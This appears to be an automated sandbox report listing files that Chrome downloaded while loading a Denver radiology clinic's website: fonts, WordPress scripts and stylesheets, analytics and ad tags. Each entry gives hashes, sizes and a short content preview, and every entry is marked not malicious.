                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/barlow/v12/7cHqv4kjgoGqM7E30-8s51os.woff2
                                                                                                                                                                                                                                        Preview:wOF2......U$.........T..............................f..P.`..r.. ........p..6.....6.$..4. ..D..M..V......v...]%...i(m6....OU..gGX.8..^v....J:dhB]...uu.,wwA.....DT...W._.#/....g.......L5.=v:tG..s....B..,LC..L....b.D......5H/.t...8...X..D.6M...Cr.N...F.;.'5....$...)=...]U.S!..1...&.#w.]w.ck.3.m.Or..<.c...9.4.U.eLB'QE..t.H..=...3ow....k.$...(......U.C.i..@X........./A#ND7........~R..^{uK.N.'.......O..>.N)E.C!...`........@..*0.......ud....[_Q..ZU...1...Nm.....,...@..2.}....GC5..4..j.5z.................T...'.tP`..Z;...E. Y.........U%.MDV....!.<I4...G....s,..C.$*$.@.59k.....}...........E.QJ...1...xZnD.......?.<8...u)...........7..`y..6..J...%?..Xj/#..?........$|.......[....wm...k:...].Sak...<{../;r.J...u8.....ZW.U..../.r_..`.G....6<_c..s.lQK.I...@(....h...\.._....;\.V.{.........;.w.r6.....`I`q...gh...8..e..W.y.q6zk`.O'K.:CY..A.>.>tY......?.._.....I..#.0~.{.-.O~.}.-K.(D.@v..d..I....p.NS.....N....X[}..4..%1.$.C(..........E..}..wo..4v.Tz....P.<D.B..E..
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:JPEG image data, progressive, precision 8, 360x165, components 3
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):8810
                                                                                                                                                                                                                                        Entropy (8bit):7.9091406199392775
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:25F42CDB6A1AB2FC6CE0D1B6F42C21C6
                                                                                                                                                                                                                                        SHA1:6DEF54B358917DD2DE4D0D749745DAFAFFFC0C8B
                                                                                                                                                                                                                                        SHA-256:7572AFAD5F3EEB9D2396CD2A0C7ACD68D5043EE04606C04DDE1F7CD4D2C52A1C
                                                                                                                                                                                                                                        SHA-512:9902710045DF7DAEF557F47ABD5D5CA3541619FDE086994BF3FE201706A3D2706CA9AD6860ABC11E1DE7392211FFA9C7669F0CDA2659674266E9335AA5348913
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...................................................!........'.."#%%%..),($+!$%$...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$........h.."..........5........................................................................(..js.^.Y.................!...*...W..&.si..>...I)(h(h(h(..f`WK..W.]...g%......6.Z..>.S.U.#....R......s..V]...~G..y._X.._..A.w._S.._.s^..tm...OW_..[t....zf.^c8.zs.F<...*.O..my...#..P..iU.K].)(ic.....tX.............k.s.,....w.r$.~..W...1J>...I...~n.....A]..5k.sZA..i........?u..{.?Y....m)^.o.....p.....).Fk.Zaa..u|....X....21........5.k^o..H.9V.s...Y..&.l]....z..*uQ.........v...F.G.)....t...f7=k>...t..?......U..........zQ.....y.g..Y..89..F!....0...?01....v...x./.....>.....g..noNdw.......!R.3k.`V...q{.q..<^I..,....3....v.o.......f... Y..,.,.,.,.,.,.,..O.5.n.a/.....r....v!...v{.l2...%....&.=..h.XX,.,.,.,.,.,.,.$.G..............hl...X....7..j.7*m...bu.NQ......p..!.A.F\$.$.$.$.$.$. .G.0x.x.'............{.t../...z:.....;..=.=
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):3687
                                                                                                                                                                                                                                        Entropy (8bit):5.330877833367615
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:0E37878284CD122FC62D64EC2791EDFB
                                                                                                                                                                                                                                        SHA1:78DF5A26CB08553554EC58ED6824A17B3D3B58E0
                                                                                                                                                                                                                                        SHA-256:610BDDA6C8B51D1A55BD4300DE41992510E140FB0EC90ACCAEED956C9FBA6865
                                                                                                                                                                                                                                        SHA-512:95AC34D608FDCDA5EB3FB3B003506EC89F978861A22FEF81855FED89BDEE7FAF8ED353C9D02F38ED77778CA5273D59818B286F81FC3317F0B86FB36CA43AF2D3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://fonts.googleapis.com/css?family=Barlow%3A400%2C600%2C500&display=swap
                                                                                                                                                                                                                                        Preview:/* vietnamese */.@font-face {. font-family: 'Barlow';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/barlow/v12/7cHpv4kjgoGqM7E_A8s52Hs.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;.}./* latin-ext */.@font-face {. font-family: 'Barlow';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/barlow/v12/7cHpv4kjgoGqM7E_Ass52Hs.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Barlow';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/barlow/v12/7cHpv4kjgoGqM7E
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1136)
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1603
                                                                                                                                                                                                                                        Entropy (8bit):5.2727801090429285
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:78FD7C1A980B9162702E6F984A25B7A6
                                                                                                                                                                                                                                        SHA1:E832ABE897CDAA5E36131733AF619F174AD0F9C5
                                                                                                                                                                                                                                        SHA-256:1C5A3539A6FBE5420A519540FF6662EFEACB0BB1B9B8314C74064694A0D52C0B
                                                                                                                                                                                                                                        SHA-512:06B0C9A98D1F6B5BCF81D81574258B7D479579CD80FC51105C58B99263D802EFD64ECF6B5A9A3105C1046FB7EE3F776547E1593436AFC3E6C0820D149C0913BA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<!DOCTYPE html>.<html lang=en>. <meta charset=utf-8>. <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">. <title>Error 404 (Not Found)!!1</title>. <style>. *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (14366), with no line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):14366
                                                                                                                                                                                                                                        Entropy (8bit):5.221798782931504
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:252A7A5BBB2E3DD12F13C550625CC8BA
                                                                                                                                                                                                                                        SHA1:6EA01C6C412EEC51D81CB1101ACECCCEDC565A32
                                                                                                                                                                                                                                        SHA-256:B6043EE4A9960E025742C70262F22B6585271DF6DE2C4CC1148962FD5EDC8C0B
                                                                                                                                                                                                                                        SHA-512:2587956A00BF9240B700E918D4D588D6A049DB422DE34F7DF2A6C1E1BFD5C1E55017C4EBA60E3459090A8F5870522BD824855F6A1BEBED12F8818A94D80A4C58
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_252a7a5bbb2e3dd12f13c550625cc8ba.js
                                                                                                                                                                                                                                        Preview:(()=>{var e={7152:function(e){e.exports=function(){"use strict";function e(){return(e=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var n,i=arguments[t];for(n in i)Object.prototype.hasOwnProperty.call(i,n)&&(e[n]=i[n])}return e}).apply(this,arguments)}function t(e,t){void 0===t&&(t=[]),Array.isArray(t)||(t=[t]),t.forEach((function(t){return!e.classList.contains(t)&&e.classList.add(t)}))}function n(e,t,n,i){e.addEventListener(t,n,i)}function i(e,t,n){e.removeEventListener(t,n)}function o(e,t,n){return void 0===n&&(n=""),e.setAttribute(t,n),e}function r(e,t,n){return Object.keys(t).forEach((function(n){e.style[n]=t[n]})),n&&getComputedStyle(e),e}var a={direction:"horizontal",touchRatio:1,touchAngle:45,longSwipesRatio:.5,initialSlide:0,loop:!1,freeMode:!1,passiveListeners:!0,resistance:!0,resistanceRatio:.85,speed:300,longSwipesMs:300,spaceBetween:0,slidesPerView:1,centeredSlides:!1,slidePrevClass:"swiper-slide-prev",slideNextClass:"swiper-slide-next",slideActiveClass:"sw
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (7994)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):338839
                                                                                                                                                                                                                                        Entropy (8bit):5.6181519533864845
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:CA9E14630511A7ADDD3CFAF7138AE8CF
                                                                                                                                                                                                                                        SHA1:E4282E9BA4C1DAFAD49B10C2AE5C123129FD4C31
                                                                                                                                                                                                                                        SHA-256:2CFD53692BE910351BCB686941D4361E057DC8CAC7CB5B2D461FDEA315129125
                                                                                                                                                                                                                                        SHA-512:E99909F20CC6AE1829B28A1D7E14B959152F90A2791928F6FF00CE5266474FEB23EA675016A8A5980251029D179FCC8A2EC7E6963991AC03158D72087CFB1624
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://www.googletagmanager.com/gtag/js?id=G-212GLDWB2Y&cx=c&_slc=1
                                                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":8,"vtp_value":true,"tag_id":10},{"function":"__ogt_referral_exclusion","priority":8,"vtp_includeConditions":["list","mipscenter\\.com"],"tag_id":12},{"function":"__ogt_session_timeout","priority":8,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":13},{"function":"__ogt_1p_data_v2","priority":8,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECT
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4941), with no line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):4941
                                                                                                                                                                                                                                        Entropy (8bit):4.927038852270192
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:8313CA1FD10BA3E753682FA673EBD09B
                                                                                                                                                                                                                                        SHA1:8A3E1841A9C5F29225A68B0845F535D4AE083280
                                                                                                                                                                                                                                        SHA-256:9173F6C9E713A95D77447EA620A640517344CFFF7CD2450737F99D678C905698
                                                                                                                                                                                                                                        SHA-512:BDA4F503C2A644E69E003277DC46ABD29E72DA62C41720BE54020EC21E0ACCE6F42C27D6F9BD42154065315DBFA83FD41621451BD0686A6376A974F668435BB9
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/css/autoptimize_single_ad34bf64095d41b275a906520ae9f961.css
                                                                                                                                                                                                                                        Preview:.pcr-form-container{border-bottom:1px solid rgba(128,128,128,.2);padding:0 0 1rem;margin:0 0 1rem}.pcr-review-form fieldset{border:0;padding:0;margin:0 0 1rem}.pcr-review-form legend{padding:0;margin:0 0 .5rem;border:0}.pcr-required-field:after{content:"*";color:#c84554;font-weight:700;margin-left:.5rem}.pcr-error-message,.pcr-success-message{border:1px solid rgba(128,128,128,.2);border-left:6px solid #dc3545;margin:1rem 0;padding:1rem}.pcr-error-message *:last-child,.pcr-success-message *:last-child{margin-bottom:0}.pcr-error-message{border-left-color:#dc3545}.pcr-success-message{border-left-color:#28a745}.pcr-star-icon{filter:drop-shadow(1px 1px 0px rgba(0,0,0,.5))}.pcr-rating-stars{position:relative;overflow:hidden;width:200px;height:40px}.pcr-rating-stars label{float:right;display:inline-block;margin:0;padding:0;cursor:pointer;text-decoration:none;width:auto !important}.pcr-rating-stars input{position:absolute;top:0;left:0;opacity:0;width:0;height:0;display:none}.pcr-rating-star-0{
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (13137), with no line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):13137
                                                                                                                                                                                                                                        Entropy (8bit):4.864104383148316
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:D6F61A41DE6BA8FFD0C79642DD9D2A34
                                                                                                                                                                                                                                        SHA1:04AD5A4C8A040694A3FD53B4EE0F1FAFA64AB246
                                                                                                                                                                                                                                        SHA-256:96817C2128FCF15860728619A510E13907A297E3E488E3EDCEB16A243B3981E5
                                                                                                                                                                                                                                        SHA-512:095CD3E3AA6EFF2823D416A180190B8B012613B0C42D0FBD02EB23B5BFD7779915D015148DD4BF222BCB7B671A9E4C4CBD571215F9F869AA7FBC5346FAE5A3D3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/css/autoptimize_single_902edd9f8303a0e7c9be4bf721669a29.css
                                                                                                                                                                                                                                        Preview:[hidden]{display:none}.foundation-mq{font-family:"small=0px&medium=760px&large=992px&xlarge=1200px&xxlarge=1400px"}[data-whatinput=mouse] button{outline:0}.is-visible{display:block !important}.is-hidden{display:none !important}.menu{padding:0;margin:0;list-style:none;position:relative;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-wrap:wrap;-ms-flex-wrap:wrap;flex-wrap:wrap}[data-whatinput=mouse] .menu li{outline:0}.menu a,.menu .button{line-height:1;text-decoration:none;display:block;padding:.7rem 1rem}.menu input,.menu select,.menu a,.menu button{margin-bottom:0}.menu input{display:inline-block}.menu,.menu.horizontal{-webkit-flex-wrap:wrap;-ms-flex-wrap:wrap;flex-wrap:wrap;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row}.menu.vertical{-webkit-flex-wrap:nowrap;-ms-flex-wrap:nowrap;flex-wrap:nowrap;-webkit-box-orient:vertical;-webkit-box-direction:normal;-webkit-flex-
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (443)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):1062
                                                                                                                                                                                                                                        Entropy (8bit):5.314126354936645
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:3FFCF90D6A500901FBFC3CA433D154AA
                                                                                                                                                                                                                                        SHA1:B7CD7B746D960A922CB86D66945D1EC68E10AC0C
                                                                                                                                                                                                                                        SHA-256:C29CE44C663C8A68EEE9898E2B403C2E21900C7B9FA8B60E1281B4ECDD2B8893
                                                                                                                                                                                                                                        SHA-512:58D807814E6D9A600314D832F93BB98FB35A2307948A0974BF0676B146228CF5A04E698583002935A14BD56317B37E922761B8086035ED2E4BB0C912382E5CAB
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_c2f22d5d09dfdd628e1facc491a5a0fd.js
                                                                                                                                                                                                                                        Preview:(function($,root,undefined){./*! Avoid `console` errors in browsers that lack a console. */.(function(){var e;var d=function(){};var b=["assert","clear","count","debug","dir","dirxml","error","exception","group","groupCollapsed","groupEnd","info","log","markTimeline","profile","profileEnd","table","time","timeEnd","timeline","timelineEnd","timeStamp","trace","warn"];var c=b.length;var a=(window.console=window.console||{});while(c--){e=b[c];if(!a[e]){a[e]=d}}}());./*!.* Responsive table images.* Make Firefox and Opera respect the max-width rule on images inside of tables.* @author Bryan Miller.* WTFPL license.*/.!function(A){var a=A("<img style='max-width:100%' src='data:image/bmp;base64,Qk1KAAAAAAAAAD4AAAAoAAAAAwAAAAMAAAABAAEAAAAAAAwAAADEDgAAxA4AAAAAAAAAAAAAAAAAAP///wAAAAAAwAAAAKAAAAA%3D'>").appendTo(A("<div style='display:table-cell;width:1px;'></div>").appendTo("body"));A.support.tableCellMaxWidth=1==a.width(),a.parent().remove(),A("table").has("img").each(function(){A(this).css({"ta
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (23937), with CRLF line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):24116
                                                                                                                                                                                                                                        Entropy (8bit):5.043937990630254
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:3DE93FD7F4FD02EDDFBAF67A5FD24465
                                                                                                                                                                                                                                        SHA1:EBE01C20561D6B75A50232C9259B952BD8401132
                                                                                                                                                                                                                                        SHA-256:32EEB4ECF345AEABC16140C05FAC6CAD07581D842E7012E694B38610B3B357FE
                                                                                                                                                                                                                                        SHA-512:D02A606A70D1DEFE880F76C46C5E25A5613FE4F8A32BBDE13025E6F052913EC06BA635A235E0295D07AC084962C8FCBCC419677E560306F79548412078C4CD14
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/plugins/mypractis/modules/practis-wysiwyg-icons/third-party/animate.min.css
                                                                                                                                                                                                                                        Preview:/*!.. * animate.css -http://daneden.me/animate.. * Version - 3.7.0.. * Licensed under the MIT license - http://opensource.org/licenses/MIT.. *.. * Copyright (c) 2018 Daniel Eden.. */@-webkit-keyframes bounce{from,20%,53%,80%,to{-webkit-animation-timing-function:cubic-bezier(0.215,0.61,0.355,1);animation-timing-function:cubic-bezier(0.215,0.61,0.355,1);-webkit-transform:translate3d(0,0,0);transform:translate3d(0,0,0)}40%,43%{-webkit-animation-timing-function:cubic-bezier(0.755,0.05,0.855,0.06);animation-timing-function:cubic-bezier(0.755,0.05,0.855,0.06);-webkit-transform:translate3d(0,-30px,0);transform:translate3d(0,-30px,0)}70%{-webkit-animation-timing-function:cubic-bezier(0.755,0.05,0.855,0.06);animation-timing-function:cubic-bezier(0.755,0.05,0.855,0.06);-webkit-transform:translate3d(0,-15px,0);transform:translate3d(0,-15px,0)}90%{-webkit-transform:translate3d(0,-4px,0);transform:translate3d(0,-4px,0)}}@keyframes bounce{from,20%,53%,80%,to{-webkit-animation-timing-function:cubic-b
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3679), with no line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):3679
                                                                                                                                                                                                                                        Entropy (8bit):5.758309026066164
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:AF77F4A853F51808AE40D0B2A0BE5372
                                                                                                                                                                                                                                        SHA1:6A22F892E44F2D42232D5A4D3D8181B0C9432AEE
                                                                                                                                                                                                                                        SHA-256:29FC298BB5E474797A5A198C2C61FD589C3BD81C26F417B4CDC71551C13EEFCC
                                                                                                                                                                                                                                        SHA-512:770628FD894187A132EFE12EF96236807EA89CE62F8266FFBE952FCA5AF0BF900B73E68A6BB96B98B104278B63A0DFA36AE8DB8D114DA69744D4883F3DF37A79
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/11060750287/?random=1743111905938&cv=11&fst=1743111905938&bg=ffffff&guid=ON&async=1&gtm=45be53q1za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=102482433~102522474~102788824~102803279~102813109~102887800~102926062&u_w=1280&u_h=1024&url=https%3A%2F%2Fmipscenter.com%2F&hn=www.googleadservices.com&frm=0&tiba=Interventional%20Radiology%20in%20Denver%2C%20CO%20%7C%20MIPS%20Center&npa=0&pscdl=noapi&auid=1553177151.1743111906&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4
                                                                                                                                                                                                                                        Preview:(function(){var s = {};(function(){var k=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,d,b){if(a==Array.prototype||a==Object.prototype)return a;a[d]=b.value;return a};function l(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var d=0;d<a.length;++d){var b=a[d];if(b&&b.Math==Math)return b}throw Error("Cannot find global object");} var p=l(this),q=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",r={},t={};function u(a,d,b){if(!b||a!=null){b=t[d];if(b==null)return a[d];b=a[b];return b!==void 0?b:a[d]}} function v(a,d,b){if(d)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in r?g=r:g=p;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];b=q&&b==="es6"?g[c]:null;d=d(b);d!=null&&(a?k(r,c,{configurable:!0,writable:!0,value:d}):d!==b&&(t[c]===void 0&&(a=Math.random()*1E9>>>0,t[c]=q?p.Symbol(c):"$jscp$"+a+"$"+c),k(g,t[c],{co
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (44186)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):44260
                                                                                                                                                                                                                                        Entropy (8bit):5.4668669104082115
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:07AE3B6B3B89501942776C01CC7F195A
                                                                                                                                                                                                                                        SHA1:B2744F043034B7DFD5732A21748E5868EF882A5F
                                                                                                                                                                                                                                        SHA-256:83A0CEF96BEF8FD0B1AE3D260BD2CFA992D821820D435F54FCF274D09726379D
                                                                                                                                                                                                                                        SHA-512:1002B348A7B1F8F5C2D14F4E1B5DEBD74E7DCAC8EB8E4244A59A0E3429D96B498144E636F2204E3B165212B515C352F32EBDBE5393E147BCCF08F2A2754549AA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/pako/2.0.4/pako.min.js
                                                                                                                                                                                                                                        Preview:/*! pako 2.0.4 https://github.com/nodeca/pako @license (MIT AND Zlib) */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports):"function"==typeof define&&define.amd?define(["exports"],e):e((t="undefined"!=typeof globalThis?globalThis:t||self).pako={})}(this,(function(t){"use strict";function e(t){let e=t.length;for(;--e>=0;)t[e]=0}const a=256,i=286,n=30,s=15,r=new Uint8Array([0,0,0,0,0,0,0,0,1,1,1,1,2,2,2,2,3,3,3,3,4,4,4,4,5,5,5,5,0]),l=new Uint8Array([0,0,0,0,1,1,2,2,3,3,4,4,5,5,6,6,7,7,8,8,9,9,10,10,11,11,12,12,13,13]),o=new Uint8Array([0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,3,7]),h=new Uint8Array([16,17,18,0,8,7,9,6,10,5,11,4,12,3,13,2,14,1,15]),d=new Array(576);e(d);const _=new Array(60);e(_);const f=new Array(512);e(f);const c=new Array(256);e(c);const u=new Array(29);e(u);const w=new Array(n);function b(t,e,a,i,n){this.static_tree=t,this.extra_bits=e,this.extra_base=a,this.elems=i,this.max_length=n,this.has_stree=t&&t.length}let g,p,m;function k(t,e){this.dyn_
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):434303
                                                                                                                                                                                                                                        Entropy (8bit):5.194755389764617
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:FFE600C849D3D56353A647D386D420E1
                                                                                                                                                                                                                                        SHA1:CC9595191EC151B91D8B289801A2F3D5BADF2367
                                                                                                                                                                                                                                        SHA-256:7D93E7ABC2FCF8F3EDEA7A81F4B38DD9DE82E77E4E4F217523800B4D23C50E24
                                                                                                                                                                                                                                        SHA-512:28DFAEA1E21A4D85A0DF03C225306CF3903A64D3EB1D6709AF48441F7A5F4E2C2DB57B685D1BB3351C2F47580D6C21DFB490BD96A8AC842FF5D5C2345FBC4891
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://www.youtube.com/s/player/8a8ac953/www-player.css
                                                                                                                                                                                                                                        Preview:@charset "UTF-8";.html5-video-player{position:relative;width:100%;height:100%;overflow:hidden;z-index:0;outline:0;font-family:"YouTube Noto",Roboto,Arial,Helvetica,sans-serif;color:#eee;text-align:left;direction:ltr;font-size:11px;line-height:1.3;-webkit-font-smoothing:antialiased;-webkit-tap-highlight-color:rgba(0,0,0,0);touch-action:manipulation}.html5-video-player,.ytp-contextmenu{-ms-high-contrast-adjust:none;forced-color-adjust:none}.html5-video-player:not(.ytp-transparent),.html5-video-player.unstarted-mode,.html5-video-player.ad-showing,.html5-video-player.ended-mode{background-color:#000}.ytd-video-masthead-ad-primary-video-renderer .html5-video-player:not(.ytp-transparent),.ytd-video-masthead-ad-primary-video-renderer .html5-video-player.unstarted-mode,.ytd-video-masthead-ad-primary-video-renderer .html5-video-player.ad-showing,.ytd-video-masthead-ad-primary-video-renderer .html5-video-player.ended-mode{background-color:transparent}.ytp-big-mode{font-size:17px}.ytp-autohide{cu
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (768), with no line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):768
                                                                                                                                                                                                                                        Entropy (8bit):4.972231184311666
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:2C1A741E14FEF88699DBE03354504A52
                                                                                                                                                                                                                                        SHA1:BA6CB1F5FD34FB8B08FAC5CE51F82C90DDEF3496
                                                                                                                                                                                                                                        SHA-256:40B515A8BF45497950CD06594D04B7E8040B0D5CDEBAD7A9C4F09756F8227536
                                                                                                                                                                                                                                        SHA-512:3A92E5AFE0B6BE01F417CA929B2BCF0CAB081451BEF1E5A0B67C6E7FA60FA6A3E45BFEDBA638FF478A8DB1047649103B0A3338F1B494A124CC6B5B37A3C857D0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/css/autoptimize_single_4272f4f016405eab091b0b7a96715832.css
